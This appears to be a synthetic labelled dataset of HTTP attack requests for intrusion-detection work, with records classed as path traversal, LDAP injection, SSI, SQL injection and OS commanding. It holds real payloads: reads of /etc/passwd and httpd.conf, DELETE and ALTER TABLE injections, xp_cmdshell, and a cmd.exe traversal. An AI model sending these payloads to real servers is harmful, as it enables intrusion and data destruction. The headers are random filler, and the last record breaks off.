POST /o4dRG02G@XCm.htm? HTTP/1.1
Content-Length: 230
Content-Language: 6e
Content-Encoding: identity
Content-Location: /1elsSdu/xeda/uicga/fhe9fpu/tos50T8e.html
Content-MD5: RXhlYjVyZWxpYW1paVRyag==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Nov 07 04:30:24 GMT
Last-Modified: Sun, 24 Apr 05 18:56:56 CET
Host: 154.90.212.223
Connection: lrnma5
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.7, deflate;q=0.6, identity;q=0.8, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 230.63.102.101
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="11"
Date: Wed, 07 Apr 04 09:08:23 CET
ETag: "plt73QUn8kWDZLJVBbM"
Expect: 5teotwi=c4dkufDm;eodxa=0orrzrci
From: ntofsxe@nilrhaih6.gov
If-Modified-Since: Thu, 10 Feb 05 01:59:17 CET
If-Unmodified-Since: Wed, 06 Oct 04 07:36:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.9
Pragma: e='yEn'
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic TmFycjowR3RZaA==
Range: 8542-,-709
Referer: /erTlncE/ihtnNt/Indsr.pl
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: tesenotiocacKho6m
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: FTP/3.1 www.aNes.tiff, fraa/8.9 178.36.234.229
Transfer-Encoding: deflate
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 321 92.208.70.203:11 "elAnigceatyit1" "Sun, 21 Nov 04 10:31:52 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fjmupaARrc=coZA-13yOE_&2ssn0G=f8c&olp8lnr=Ri&pnaigaUsuec=83119&cktaeadesese7=%2e%2e.\%252f/\%252f/...\%252e..%2e&ohtOcsitd9n=aflopieaehy&SXeOqXVHMdds= ee6e&ooleOo=awindow.open&AnRpI=oenrt&formIKXO8=9&rcm=5525

End - Id: 44712
Start - Id: 46071
class: PathTransversal
GET /mdcs35ztoe/Otfa0ryoaa/nH7QxZSz3B.GvA0sKzYZ/4pU0DIs1D/3orwZ.swf?husU7dfa=055&e4=C5luoxtermoro&hl=S%25tmp3d&raJse9NTcq=50&t1=vetebis2eea&ny=28&nij=8164282632&odIsaio6ya0l=noV HTTP/1.1
Host: 153.25.133.31:80
Connection: AhyA
Accept: image/jpeg;q=0.1, image/*
Accept-Charset: iso-2022-jp;q=0.8, utf-7
Accept-Encoding: compress, deflate, identity, compress;q=0.9, identity
Accept-Language: shretop-h1tonjb, nAtcoeIs-oacjsP;q=0.1
Cache-Control: max-age=2501
Cookie: c5ro7ew=8014003;lesicvotdbhbe=/etc/httpd/httpd.conf;B68c3GoPeLUmeta=748
Date: Sun, 19 Dec 04 06:13:25 GMT
If-Unmodified-Since: Sun, 17 Apr 05 02:05:58 GMT
If-Range: Sun, 08 Feb 09 04:38:08 GMT
Max-Forwards: 39
Pragma: h=eiedIT
Proxy-Authorization: Odwo srhzee=kUkuhd
Authorization: Basic dXNnZW9ncWE6c2V0bTA=
Referer: /pnrd/Etvu.php3
User-Agent: ee3lste/3.3.7.1.9
UA-OS: Windows 95
UA-Pixels: 515x743
X-Forwarded-For: 144.253.67.211
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 46071
Start - Id: 46258
class: PathTransversal
GET /aj/X-R5xB940JOr/aM5PHY8xF@v_Lq9eqm/0xXvqKlAfy6P/omiehhosredlt.htm?apoowtee8torute=%2F%2C%2C%2C%2Fe5ba%2F4ne10s%2Fpasswd&pasitel=76rT4hlgt&Y2s9iekfyrt=%5CteiNinumunion3A%3BaOlq&2a8wt16l7tc=295912&dlewb=+tm&iwiOuw8Usnh=hfLXdlrse6mona+ee&.cBmochaQ6pYunion4GN=Oex%29&eNDlpjaddzeb=4069014962&naezqervsaw=emnhavingieUathbs&umes=l%40pHQ&dialticSitaiy=89384155&raoi2xPoadh=se6ti7txzz&yw=iamWrAEA&coaansirptdssi=eFeh HTTP/1.1
Host: 101.187.132.51
Connection: nIITdir
Accept: audio/x-wav, video/*;q=0.6, audio/basic;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: iele-teWlrp, 9esieefr-od6;q=0.7, vIi-ws8t;q=0.8
Cache-Control: max-age=04777
Client-ip: 190.79.101.95
Cookie: l6oOue=lnK6E
Cookie2: $Version="03"
Date: Thu, 01 Nov 07 23:09:36 CET
ETag: "_9L1EBmUlyekels"
Expect: lbdrls=ACfiR
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 19 Oct 06 21:49:57 UTC
If-Unmodified-Since: Sat, 19 Dec 09 24:35:31 CET
If-Match: *
If-None-Match: "sLmj3ROUKuDqC0iagaJ"
If-Range: Sun, 14 Jun 09 10:23:41 UTC
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: NTLM dDJOdDA2dGZhcExXZTBlYXNlMnJhcmVwYWhlYVM4bkFjaWJkdA==
Range: 5263-
Referer: http://ioli.st/e7tpn0r/R8isf5/laaf/rNee/2Th6v.pl
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 7.5; TN-me; rv:6.9.9) Gecko/80344859
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: HTTP/1.9 www.SnE50.css, eth/8.7 34.210.172.206:0, 1.0 www.wi5lsid.html
Transfer-Encoding: compress
Upgrade: roeie/1.4
Warning: 961 59.212.87.203:1 "2ryq" "Mon, 19 Mar 07 07:17:54 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46258
Start - Id: 38487
class: LdapInjection
GET /l9xiplC70T-dOwkdw-TN/padXtUDl/e1D_PUWbQnhr/x05o../1dzClP/F1H2R/qO3lijgede3momsa/In8rasnereAelolwmzm/xngZEz/aaeeeid2rKu3v.exe?ofate3etr=653&VVnodevarW9pQiBLj=Jeia0catnh&jvkaCi@tACscript=%29++++%28+%7C++%28displayName%3Dhad*%29+++%28name%3D++++had*++++%29%28mail%3Dhad*+++%29 HTTP/1.1
Host: www.geldtcsc.it:80
Connection: jae5WSs
Accept: image/gif, application/*;q=0.6, video/*
Accept-Charset: windows-1250, x-mac-arabic;q=0.5, us-ascii
Accept-Encoding: identity
Accept-Language: hsyrl-tfsop, tcepoQi-iep0E, uhtYROai-fboame, tR-sD
Cache-Control: no-store
Client-ip: 233.33.102.205
Cookie: autoexecMxbpUbin7includeXiS=f8C@R4Q
Cookie2: $Version="9"
Date: Tue, 02 Jan 07 07:31:42 CET
ETag: "TciWgfyFegrTeCENGp.D"
Expect: deissg=asa6
From: b8antatt@o1neid.cz
If-Modified-Since: Tue, 13 Apr 10 06:20:18 CET
If-Unmodified-Since: Mon, 24 Jul 06 14:24:06 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 14:24:55 CET
Max-Forwards: 3
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cnRlY3VraXJoOG9lNXNvcXJpcnBrU3dSMXRJRXRsZHRhRVRm
Range: -58851,3847-,8968-910
Referer: http://www.hgbpO.st/ewnfpyox/senehft.css
TE: chunked,chunked;q=0.4,gzip;q=0.5
Trailer: Authorization
User-Agent: s73TiNcigr (gTDgTV; nj1.iMJmr@)
UA-CPU: 68000
UA-Disp: 873,0071,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 6621x951
Via: iopetn/5.4 www.nsioo.tiff, FTP/0.3 www.istshf.tiff
Transfer-Encoding: eOuio; acielhr=eAuthr3
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 108 www.eRer.jpeg:0 "4tlbDiVFhs4icrP" "Sun, 15 Aug 04 17:42:40 CET"
X-Forwarded-For: 21.183.247.173
X-Serial-Number: 8565701730547644653
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38487
Start - Id: 37325
class: LdapInjection
GET /BUUchildspSOd/sCry/ysi.png?Tet=4777&Yjb-_g=68483&vIperl.X=vtmpl%5Dgf%3BosherlDzmailne&iiisearusjefua=3&YpTu5L=+ijo%5DN%26antuoD&grEqnfe8i=%40keC%3F+t+fihabc&9XWselectNBjskd1=39980&hs7=usrenc&5w2sgA@0Eo=hh0sMivP8&xcmdDDcmdjuz=plroet HTTP/1.0
Host: 206.143.180.8
Connection: close
Accept: video/quicktime, application/*;q=0.1, text/xml;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nlm-uodattr;q=0.1, cqdnC-oto, o2t-aue, u6Abihau-t3mc
Cache-Control: only-if-cached
Client-ip: 142.91.167.247
Cookie: H1andE99rm=l3A5iidtemdhlddre;kdaich=b.s_iuX;wUoZ2_bx1rR=1vgehoa;OpmetaLY0H=541397
Cookie2: $Version="51"
Date: Mon, 11 Feb 08 03:36:51 GMT
ETag: "98VQaYC9N.W5V.CpbpHX"
Expect: ahws
From: ddtp@lesT.org
If-Modified-Since: Tue, 19 Jul 05 02:07:56 GMT
If-Unmodified-Since: Fri, 11 Jul 08 06:48:56 CET
If-Match: "R_t2Fy4Z0mJmZ55fW"
If-None-Match: "Sj4Wwi82IU8Q.n3iC@_"
If-Range: Fri, 18 Nov 05 12:50:00 UTC
Max-Forwards: 1627
MIME-Version: 5.2
Pragma: uocoeH=t
Proxy-Authorization: IsutEF eroAyite=x4sapfr
Authorization: NTLM ZGRvdGVvaGFhMHh2THJFcXJUc3doaW5VZHNpcjBkNjFkdG1laW1uYWll
Range: 1-568088,6956-8,075-
Referer: http://redes.org/noalfol/eimu/22ebhd.dll
TE: gzip,gzip;q=0.9,trailers
Trailer: Range
User-Agent: )( |  (ca=zuod*)
UA-CPU: x86
UA-Disp: 2661,0577,16
UA-Color: color16
Via: a5Soc/6.3 www.ahdNe.jpeg, 4.2 www.zvfAr.png, HTTP/4.1 62.37.138.148
Transfer-Encoding: deflate
Upgrade: heF/2.0, te4nOj/7.2, eHiy5/0.3, axi7h/7.2, neuis/0.9
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 71.227.252.82
X-Serial-Number: 06549032
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37325
Start - Id: 39517
class: SSI
GET /nvEa2asEadsmj/r3NE2dxI@/ed/hs06forfXm5Bg.7kBkfK/08ean8g/ZXrYTv5OH/inbanhTi/ntd/fT.BtX.OWIt5X2Fw/3.tkmnJ/iltentNw/BMTuYKwget6home_scriptp.cfm? HTTP/1.0
Host: www.e7intinoie.st:414
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: cp-936;q=0.4, koi8-r;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.5
Cookie: aovhht=lajtaango-u7nuw;nH=eds;dhrino=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E;xmlT9K.6%u=70018226
Date: Wed, 02 Jun 04 20:12:11 UTC
ETag: W/"WeRrPImoBrnYtxGi@o"
Expect: 100-continue
If-Modified-Since: Mon, 19 Apr 04 21:20:10 UTC
If-Unmodified-Since: Wed, 30 Aug 06 19:44:21 CET
If-Match: "TsZ7MaNaanIWRzg"
If-None-Match: "5XBiRbnU8U0Ks_LRLij2"
Max-Forwards: 558
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM TmFpbGVvZnRvYmVzb3NodWt3dW9sdEV0d21lZW5ubWFub2Vld3llb2R1c28=
Referer: /ss27vbc0/hsnmapry/tdnulyr.mpeg
TE: gzip;q=0.9,trailers
User-Agent: Mozilla/9.7 (Windows; U; Win98 9.3; ga-ev; rv:4.0.5) Gecko/83812971
Via: FTP/8.1 www.6n5N.tiff:28
Warning: 366 www.henmfi.html "rAeC0ettnrrcouKnsAu0" "Sun, 26 Nov 06 15:37:32 UTC"
X-Forwarded-For: 81.239.118.138

null

End - Id: 39517
Start - Id: 41604
class: SqlInjection
GET /cGKCtdkPScz.5NBf/m4AY-kLMandn-/updatebodyXGR/Rfpincludetmp/a1PnoPEs.php4?nphnlenuoramRp=opt8lspd+cm5lrhyo&nmtphfn=57859344&he7i0a=ehv5r4DTn%27%29%3B+++++DELETE++++FROM++users+++WHERE++++upper%28username%29+++%3D+++upper%28+++%27admin&9lhie4=i-ZWru9tw6K&bW7samxAd4etcWF=48148281&lsxafm=62564&hk3uentsreeaao=dndee&pmlj=xlnta&avrraiss1i=zuzxeie9taik9ed8o&ohuegEth2=e7Z9mIsns&ere=1844&atotez=mb58+xrmhcrcinx&tfpseenaMo=ed6lahr8c HTTP/1.1
Host: 233.225.36.205
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-15;q=0.4, windows-1251;q=0.7, iso-8859-6;q=0.8
Accept-Encoding: *
Accept-Language: bAnx-piwa, lwtg-Iuadtt;q=0.6
Cache-Control: max-age=08
Client-ip: 66.83.180.190
Cookie: GadminQx9I=s9neptctad;s88hnhrtll=dropsfoegCeoauerX Er;Re5fsolgeig=ix5_1vu5w;ialCczTfaol=sK6goKGK
Cookie2: $Version="7"
Date: Tue, 26 Feb 08 11:48:08 GMT
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 100-continue
From: eimuyt@enr2so.ch
If-Modified-Since: Fri, 02 Nov 07 15:38:46 UTC
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "GLj31RWXyy@wOqMjY"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: "egzvQJG3T5@HMmK"
Max-Forwards: 1357
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Basic b0huZWlZcmE6Z29oNzg=
Range: -827608,0-149272
Referer: http://ypl86.uk/i5i2sp/sy2ufRl/b9afoE/anssi/tsvrtze.bin
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: jPj24FP- http://www.cC34lElU.biz
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 6.0 www.ro3ha6g.png
Transfer-Encoding: identity
Upgrade: trb/4.5, yanm/8.8, z8b/3.1
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41604
Start - Id: 37396
class: LdapInjection
GET /JCH@gfdeleteTf7.jpeg?ztbhfntuostr35t=o6iewrinbeobtHa0fb&eztt9ltnE=lsOmacceptto2ipositione&Sspj2=%40selectf&eeA6Elpw9=6&lnJ=idopt%3D+ejw%5De&teUv3cUeh=6c6LA-g1h&ta=owdeoouetun&te=gR%40sTU-&1senaerl=5Qq0Ohhnz&ntesnddl1yiCr=017 HTTP/1.1
Host: 61.158.200.125
Connection: close
Accept: audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.3, compress, gzip, identity
Accept-Language: ) (|   (   cn=*o'brien* )(mail   =*o   'brien*)   
Client-ip: 29.198.4.43
Date: Thu, 13 Dec 07 10:13:35 GMT
ETag: "vHsbEs@C-4CxSbK"
If-Match: "G5iffFO@TRRC3Yc"
If-None-Match: "50H1f1o91LPvXoGD"
Max-Forwards: 8
Pragma: no-cache
Authorization: 1sgean oydxe=bone
Referer: /saLrhanm/nnrsst/ziye/Mltxxn0o/ntit.mdb
Trailer: If-None-Match
User-Agent: eOlwtQeahb/9.3.4.6
UA-Disp: 8549,0144,8
Transfer-Encoding: hgeRt

null

End - Id: 37396
Start - Id: 37400
class: LdapInjection
GET /eIKv0OGHo/DTn/hls/oVCRca.mdb?ptbfndrePst=454415&o1wtgra6n8gi=lpXXIR&c8=6i4YpenptjtmSys9s0&ppaoas=5&tutahta3sr3a8=u%3E&re=ux1q1Raiia&nnn7neph=hmat HTTP/1.0
Host: www.dm0unseuc.net
Connection: close
Accept: audio/x-wav, image/*, application/*
Accept-Charset: x-mac-ce, x-mac-korean
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=3069
Client-ip: 129.32.184.202
Cookie: tasa2n=92)(&(objectClass=refe)(|(sn=  8mnh)(cn=ev     J*))
Cookie2: $Version="12"
Date: Fri, 17 Aug 07 02:52:32 UTC
ETag: "S@WarzkrzpyE_P.2tR"
Expect: eeawuhq9
From: a9rhuT@wsiL.cz
If-Unmodified-Since: Fri, 10 Aug 07 06:28:06 GMT
If-Match: "_uXbesii1Od9xT-El_S"
If-None-Match: "9IOsuigwxW1jqUzc"
If-Range: *
Max-Forwards: 2
Pragma: no-cache
Authorization: dpaet1 sie3e=es7o
Range: 92271-,85-
Referer: /d9ne5ar/dnajis/ectya.php
TE: trailers,trailers,trailers
User-Agent: yercbeNvpd (tDvHWVcV; y.Jr@vqu; t@IqesO; mDg5t_j; okowbky_)
UA-Disp: 462,901,32
UA-OS: Windows 98
Via: 5.2 www.ksovtSe.htm, 2.9 www.eiIeafgf.jpg, HTTP/1.7 124.156.35.141
Transfer-Encoding: gzip
Upgrade: ontd/7.5, eEr1lt/2.5
----: ----------

null

End - Id: 37400
Start - Id: 41091
class: SqlInjection
GET /jihIMMkOxPP/etsjolfndrotwa.sh?U37pform=bulk+++insert+++++rsnemyc+++from+++%27pwdump.exe%27++with+++++%28codepage%3D%27RAW%27++++%29&2oomLNUnoIhustg=rfshi&foienhad=iioa3ensla3%3DgoNee&AAQ6logjDbody8copy=9701&dta=17&R62zbodyt=t1tel&e8hka=tnno7ca&o9foraomrsht=9707&AscWdiv=0tdeTn HTTP/1.0
Host: 24.213.112.180
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, euc-cn, x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="21"
Date: Wed, 01 Jul 09 18:50:08 GMT
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: mhst@6auiinb.st
If-Modified-Since: Tue, 26 Apr 05 12:14:35 GMT
If-Unmodified-Since: Wed, 19 Oct 05 07:43:59 CET
If-Match: *
If-None-Match: "P72PtUz1UrLbSy6"
If-Range: Thu, 14 Oct 04 02:04:03 UTC
Max-Forwards: 7
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: http://www.mSaofoce.org/atsrs/emhoniti/lsht/7hteu/FiTo9.asmx
TE: trailers,chunked;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/7.6 (compatible; tuheys; Linux i586; h76rst)
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: deflate
Upgrade: tuems/4.8, nyAo/8.5, ytngoe/0.7, sai/1.7, 0eeagy/5.6
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41091
Start - Id: 41286
class: SqlInjection
GET /HCs/ion/araadeeliTgxse0Ss/4sdEehe8cNy5Dptr/h2wr4nceo8s6eqohtenM/cBfQdC8jn/pYZWklNPW/jwFXqIQ2.htm?Aeer=0adjtef3taccess_log+znB&sWnar2aqecf933=o6.&Rida1enazm=41668021&sefrdoti0hanq=8657271&HpVee=sono2f%24IseoA&mhsg4z1fhao=intit4iotiptw&thrgte=0760301289 HTTP/1.0
Host: 79.214.244.225:70
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 187.61.163.70
Cookie: lknaReetXne=eiltehse4sl;Psii=2159167;SEaBK=r tnftps5n%rtpe;itco=i5hfmtit;INtnl1eon=;alter table     rataales  set   password  =  'sit'    where   name    = 'eet1ee';;td=o3edsltevalrbdsde
Cookie2: $Version="29"
Date: Wed, 03 Dec 08 09:39:56 UTC
ETag: "J5QmpAO12KGDZIRzX9"
Expect: nozir=2tThasqs
From: muieo@6epi3hss.fr
If-Modified-Since: Sat, 24 Jan 09 22:04:44 GMT
If-Unmodified-Since: Fri, 28 Mar 08 03:56:37 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Aug 04 15:23:31 CET
Max-Forwards: 1
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: 2Toi zCgjsab1=0cdocs
Authorization: NTLM ZXYyaXdlVmY0dG5uaG9yTnFnbmU2bW5uaWxzYWRFRzg=
Range: 6-982,-186284,1-
Referer: /jOltag.exe
TE: trailers,chunked
Trailer: Referer
User-Agent: 8rioenn (eQRyET3sH; cTtWo7wu; eipF6xhE)
UA-Disp: 9646,8421,16
UA-OS: Windows NT
UA-Color: color32
Via: 7.5 185.37.15.109:28, 1.9 213.12.210.254, 9.6 www.gtr050O.shtml
Transfer-Encoding: deflate
Upgrade: tU5/4.7, t0e/4.3, aIbrw/2.1, hhrhs/1.6, xgnb/2.6
Warning: 394 www.weersiR.gif "aniskp" "Tue, 27 Apr 04 18:40:06 UTC"
X-Forwarded-For: 90.26.199.114
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41286
Start - Id: 41169
class: SqlInjection
PUT /ejdbadtooerrmxina.pl? HTTP/1.1
Content-Length: 37
Content-Language: 0igsrc,srujhh,7
Content-Encoding: gzip
Content-MD5: b25mZnl5WW5kc2Vyb21OMA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 09 Mar 07 06:43:06 GMT
Host: www.eood9syZ.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: cp-936;q=0.4
Accept-Encoding: *
Accept-Language: *
Cookie: NSiamp=4880;rmaaelhO1sj=sWY5fJ6Iza;aiahteO9id=beee;lVrmeeufti5iTn=exec   xp_cmdshell   '"we0"   >>  script.vbs';amn8gfseoc=5linkrinput
Date: Wed, 19 Apr 06 11:09:17 CET
ETag: W/"U0Nc0oAEp6UzYwiK85M"
If-Match: *
If-None-Match: *
If-Range: Mon, 18 May 09 09:48:51 CET
Max-Forwards: 851
MIME-Version: 1.1
Pragma: lccamd='cdoodu'
Authorization: NTLM aXRlbHI5cGhpbzdoaUh1VTl0ZW9kZGJwNmFuZVNsaXQ=
Range: 96758-,9357-,6458-
Referer: /enfthhe.css
TE: trailers,gzip,trailers
User-Agent: hBf0Se http://www.gpnrXie.ch
UA-Pixels: 313x443
Via: 3.6 118.74.174.202, 6.1 www.scfl.jpg
Transfer-Encoding: deflate
Warning: 006 62.2.193.196 "yhtkanas8ghahy" "Tue, 05 Oct 04 14:39:29 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xeU=cByqM&t4e=105&otVsyhtee=413365962

End - Id: 41169
Start - Id: 43821
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 60.62.233.235:80
Connection: ei8ou
Accept: text/*;q=0.9
Accept-Charset: iso-8859-8, windows-1254;q=0.9, iso-2022-jp
Accept-Encoding: 
Accept-Language: hcmnbh-tsntr8, R-t5uOs, he-d;q=0.6, hrdtjR-EiKsoos;q=0.1, ylts64e-r;q=0.5
Cache-Control: min-fresh=1640
Client-ip: 166.126.189.96
Cookie: r7t97=ioijvx4;3bsktmrreFa4t5=s;rHksIj;oovAhgixl=ttdodrenPxey;dhubssnpSeeq=EsP&;JjRMT1Y7lsKJ=777;em=TIchsareplacea ss)beeet
Cookie2: $Version="513"
Date: Thu, 10 May 07 22:20:48 CET
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Fri, 14 Sep 07 23:49:17 GMT
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: "9nhat7-TWn@3Iy1Thkn"
If-Range: *
Max-Forwards: 724
MIME-Version: 9.7
Pragma: nraRhs=3ni8
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: nhtAee iSca=rh9xakc
Range: 7246-,-7950
Referer: /yaaTkyyd/w5t8.pl
TE: chunked
Trailer: Accept
User-Agent: Mozilla/5.4 (Machintosh; U; PPC Mac OS X 0.1; su-r3; rv:2.0.2) Gecko/87111642
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 3.8 199.67.119.83
Transfer-Encoding: deflate
Upgrade: p3d/0.6, 4skh4H/9.8
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43821
Start - Id: 36705
class: OsCommanding
POST /Tsetmsjiuetae/6hUmbttaoehcy9dF8ayi/aiaqpgymXoefyuI/evwa/iH18fSc6Q_xuVxj/aV/aC8GQJrtF/lHxgfv/orKod6aasmdMloErie/utgOed1eurHoey9nrEDi/oDtvtLmuilnt/eOnds.cgi? HTTP/1.1
Content-Length: 230
Content-Language: zoedyi
Content-Encoding: identity
Content-Location: http://www.alOd.cz/ao9a/st4Le/a04Ep/hna3sBDs.mdb
Content-MD5: aHJlOG9rbHZpZXd0T2llbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 06:36:30 UTC
Last-Modified: Sun, 08 Nov 09 01:12:46 UTC
Host: 221.33.148.7:7
Connection: keep-alive
Accept: video/*, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aliv-XhE, oNes-Cn;q=0.5
Cache-Control: only-if-cached
Client-ip: 24.6.250.56
Cookie: lloatona3r=387740
Cookie2: $Version="134"
Date: Wed, 05 May 10 02:20:31 GMT
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: 7oiToetn
From: eralt@eApeeioers.de
If-Modified-Since: Tue, 08 Jun 04 08:27:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 15:44:56 GMT
If-Match: *
If-None-Match: "r9M_gIUh-jKg3lHOmA"
If-Range: Tue, 09 Feb 10 24:01:39 UTC
Max-Forwards: 38
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: ssrr uentet=otetm
Authorization: Digest nonce
Range: 426198-
Referer: http://www.eciD.it/enkqtsix/3Farttn/sAsdhaah.tar
TE: chunked;q=0.4
Trailer: Pragma
User-Agent: 0S4bsvldqTe2KRoehg
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: 6.2 www.sp2ynr.js, 5.2 www.iieees.html
Transfer-Encoding: identity
Upgrade: ebhmu/0.2, e37zho/7.1
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

v_JBtV=878885834&hUecmrehMn=sz5X&3r=|    /bin/cat     /etc/passwd%00.html&7ntyemr=932374621&ifbmtAe=404&a9Ee2NtanhOtn=a0b&f6node.Hx0Xupdatew=apotppn&8g-documentgroup byb=02988&obiHopgh=alttSl9i7deS9S&pdea3CtiltI=lJj28N

End - Id: 36705
Start - Id: 38541
class: LdapInjection
GET /arf7aoteaeWob/naieaao8agmorsty/f@NCfc.tiff?stnpnaiobn5ee=78&ndvdrfftliiU=twlz&5p=01597369&mAS8e=8401563&V5H@gUUF=66&Aen=vqLcl0498Y&2ppozfev=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Hsigttmp_=Feiet&nimulesrr=nanehseubnekteoaOr&lent=e%24ne&na=aAeE+&ahaillAasl=ir-G&ttonusinbehpa=476&reoz9e=06313486&ss=3857282 HTTP/1.1
Host: www.sa4tp.biz
Connection: close
Accept: image/gif;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ho-0dtee8h, da0u4a-lebneb9h, te-i;q=0.3
Cache-Control: only-if-cached
Client-ip: 207.161.30.104
Cookie: ejswVolxh=seuNm3pOselect;wx8objects_=9 >%saob o
Cookie2: $Version="4"
Date: Tue, 22 Aug 06 10:26:16 GMT
ETag: W/"LzfgK5k748beRBr_"
Expect: yyiraR
From: eTmmd@usijk.cz
If-Modified-Since: Mon, 04 Oct 04 24:01:58 CET
If-Unmodified-Since: Sat, 03 Sep 05 20:42:11 CET
